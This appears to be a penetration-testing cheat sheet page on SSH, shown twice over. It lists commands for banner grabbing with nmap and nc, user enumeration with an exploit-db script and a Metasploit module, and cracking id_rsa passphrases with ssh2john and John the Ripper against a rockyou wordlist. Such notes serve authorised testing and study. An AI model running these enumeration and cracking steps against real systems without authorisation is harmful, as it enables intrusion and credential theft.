SSH


===================Connect to SSH : 
>>> ssh <user name>@$IP
>>> ssh –i key <user name>@$IP

NOTE : never use id_rsa key without giving the ‘chmod 600 id_rsa’ permission to it because then it will not work correctly.

===================Banner grabbing : 
>>> nmap -sV -p T:22 $IP
>>> nc -vvv $IP 22


===================User enumeration : 
>>> python /usr/share/exploitdb/exploits/linux/remote/40136.py -U /usr/share/wordlists/metasploit/unix_users.txt $IP
msf > use auxiliary/scanner/ssh/ssh_enumusers


===================Vulnerable Versions : 
 → 7.2p1
 
===================Crack id_rsa : 
>>> /usr/share/john/ssh2john.py id_rsa > crackme.txt
>>> ssh2john id_rsa > crackme.txt 

>>> john crackme.txt --wordlist=/usr/share/wordlists/rockyou.txt

PreviousORACLE (1521)NextRDP (3389)

Last updated 2 years ago

SSH


===================Connect to SSH : 
>>> ssh <user name>@$IP
>>> ssh –i key <user name>@$IP

NOTE : never use id_rsa key without giving the ‘chmod 600 id_rsa’ permission to it because then it will not work correctly.

===================Banner grabbing : 
>>> nmap -sV -p T:22 $IP
>>> nc -vvv $IP 22


===================User enumeration : 
>>> python /usr/share/exploitdb/exploits/linux/remote/40136.py -U /usr/share/wordlists/metasploit/unix_users.txt $IP
msf > use auxiliary/scanner/ssh/ssh_enumusers


===================Vulnerable Versions : 
 → 7.2p1
 
===================Crack id_rsa : 
>>> /usr/share/john/ssh2john.py id_rsa > crackme.txt
>>> ssh2john id_rsa > crackme.txt 

>>> john crackme.txt --wordlist=/usr/share/wordlists/rockyou.txt

PreviousORACLE (1521)NextRDP (3389)

Last updated 2 years ago